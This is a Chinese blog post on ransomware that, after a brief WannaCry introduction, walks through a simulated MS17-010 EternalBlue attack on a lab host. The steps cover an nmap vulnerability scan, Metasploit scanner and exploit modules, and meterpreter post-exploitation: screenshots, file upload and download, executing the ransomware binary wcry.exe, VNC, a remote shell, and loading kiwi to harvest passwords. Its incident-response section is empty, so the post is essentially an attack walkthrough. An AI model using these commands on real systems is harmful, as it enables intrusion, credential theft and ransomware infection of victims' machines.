<h2 id="勒索病毒"><a href="#勒索病毒" class="headerlink" title="勒索病毒"></a>勒索病毒</h2><h3 id="一-简介"><a href="#一-简介" class="headerlink" title="一.简介"></a>一.简介</h3><p>​		勒索病毒是黑客通过锁屏、加密文件等方式劫持用户文件并以此敲诈用户钱财的恶意软件。黑客利用系统漏洞或通过网络钓鱼，邮件，程序木马，网页挂马等方式，向受害电脑或服务器植入病毒，进以加密硬盘上的文档乃至整个硬盘，之后向受害者索要数额不等的赎金后才予以解密。</p>
<p>​		通常使用对称加密与非对称加密组合的形式加密，绝大数无法通过技术手段破解，必须拿到解密私钥才能解决，一般无法溯源，危害巨大</p>
<p>​	常见勒索病毒—-WannaCry  (17年通过ms17_010传播)</p>
<h3 id="二-模拟攻击"><a href="#二-模拟攻击" class="headerlink" title="二.模拟攻击"></a>二.模拟攻击</h3><h4 id="1-用nmap的漏洞扫描模式"><a href="#1-用nmap的漏洞扫描模式" class="headerlink" title="1.用nmap的漏洞扫描模式"></a>1.用nmap的漏洞扫描模式</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap --script=vuln 192.168.178.128</span><br></pre></td></tr></table></figure>

<h4 id="2-打开metasploit"><a href="#2-打开metasploit" class="headerlink" title="2.打开metasploit"></a>2.打开metasploit</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br></pre></td></tr></table></figure>

<h4 id="3-搜索ms17-010相关模块"><a href="#3-搜索ms17-010相关模块" class="headerlink" title="3.搜索ms17-010相关模块"></a>3.搜索ms17-010相关模块</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">search ms17-010</span><br></pre></td></tr></table></figure>

<h4 id="4-加载扫描模块"><a href="#4-加载扫描模块" class="headerlink" title="4.加载扫描模块"></a>4.加载扫描模块</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/smb/smb_ms17_010</span><br></pre></td></tr></table></figure>

<h4 id="5-查看配置选项"><a href="#5-查看配置选项" class="headerlink" title="5.查看配置选项"></a>5.查看配置选项</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br></pre></td></tr></table></figure>

<h4 id="6-配置目标主机"><a href="#6-配置目标主机" class="headerlink" title="6.配置目标主机"></a>6.配置目标主机</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set rhosts 192.168.xx.xx  </span><br></pre></td></tr></table></figure>

<h4 id="7-开始扫描漏洞，再次证实靶机存在MS17-010漏洞"><a href="#7-开始扫描漏洞，再次证实靶机存在MS17-010漏洞" class="headerlink" title="7.开始扫描漏洞，再次证实靶机存在MS17-010漏洞"></a>7.开始扫描漏洞，再次证实靶机存在MS17-010漏洞</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit/run</span><br></pre></td></tr></table></figure>

<h4 id="8-使用永恒之蓝攻击模块：exploit-x2F-windows-x2F-smb-x2F-ms17-010-eternalblue"><a href="#8-使用永恒之蓝攻击模块：exploit-x2F-windows-x2F-smb-x2F-ms17-010-eternalblue" class="headerlink" title="8.使用永恒之蓝攻击模块：exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue"></a>8.使用永恒之蓝攻击模块：exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue</h4><p>并设置攻击载荷：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set payload</span><br></pre></td></tr></table></figure>

<h4 id="9-查看选项并设置rhosts"><a href="#9-查看选项并设置rhosts" class="headerlink" title="9.查看选项并设置rhosts"></a>9.查看选项并设置rhosts</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line">set rhosts 192.168.xx.xx</span><br></pre></td></tr></table></figure>

<h4 id="10-攻击"><a href="#10-攻击" class="headerlink" title="10.攻击"></a>10.攻击</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exploit/run</span><br></pre></td></tr></table></figure>

<h4 id="11-上传"><a href="#11-上传" class="headerlink" title="11.上传"></a>11.上传</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">捕获屏幕</span><br><span class="line"> meterpreter &gt; screenshot</span><br><span class="line">上传/下载文件</span><br><span class="line">meterpreter &gt; upload hello.txt c://</span><br><span class="line"></span><br><span class="line">pwd  查看当前目录</span><br><span class="line"></span><br><span class="line">执行勒索病毒文件</span><br><span class="line">execute -f wcry.exe</span><br><span class="line"></span><br><span class="line">查看勒索病毒是否运行</span><br><span class="line">ps -ef | grep wcry.exe</span><br><span class="line"></span><br><span class="line">meterpreter &gt; download d://1.txt</span><br><span class="line">远程桌面</span><br><span class="line">meterpreter &gt; run vnc </span><br><span class="line">获取cmd,出现了编码问题</span><br><span class="line">meterpreter &gt; shell</span><br><span class="line">获取用户密码</span><br><span class="line">meterpreter &gt; load kiwi </span><br><span class="line">Loading extension kiwi...Success. </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="三-应急响应"><a href="#三-应急响应" class="headerlink" title="三.应急响应"></a>三.应急响应</h3><h4 id="1"><a href="#1" class="headerlink" title="1."></a>1.</h4>
      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 jaytp@qq.com </span>
    </div>
</article>


<p>
    <a  class="dashang" onclick="dashangToggle()">💰</a>
</p>






    




    </div>
    <div class="copyright">
        <p class="footer-entry">
    ©2016-2020 Yelog
</p>
<p class="footer-entry">Built with <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/yelog/hexo-theme-3-hexo" target="_blank">3-hexo</a> theme</p>

    </div>
    <div class="full-toc">
        <button class="full" data-title="切换全屏 快捷键 s"><span class="min "></span></button>
<a class="" id="rocket" ></a>

    </div>
</div>

<div class="hide_box" onclick="dashangToggle()"></div>
<div class="shang_box">
    <a class="shang_close"  onclick="dashangToggle()">×</a>
    <div class="shang_tit">
        <p>Help us with donation</p>
    </div>
    <div class="shang_payimg">
        <div class="pay_img">
            <img src="/img/alipay.jpg" class="alipay" title="扫码支持">
            <img src="/img/weixin.jpg" class="weixin" title="扫码支持">
        </div>
    </div>
    <div class="shang_payselect">
        <span><label><input type="radio" name="pay" checked value="alipay">alipay</label></span><span><label><input type="radio" name="pay" value="weixin">weixin</label></span>
    </div>
</div>


</body>
<script src="/js/jquery.pjax.js?v=1.1.0" ></script>

<script src="/js/script.js?v=1.1.0" ></script>
<script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script>

<!--加入行号的高亮代码块样式-->

<!--自定义样式设置-->
<style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style>







</html>
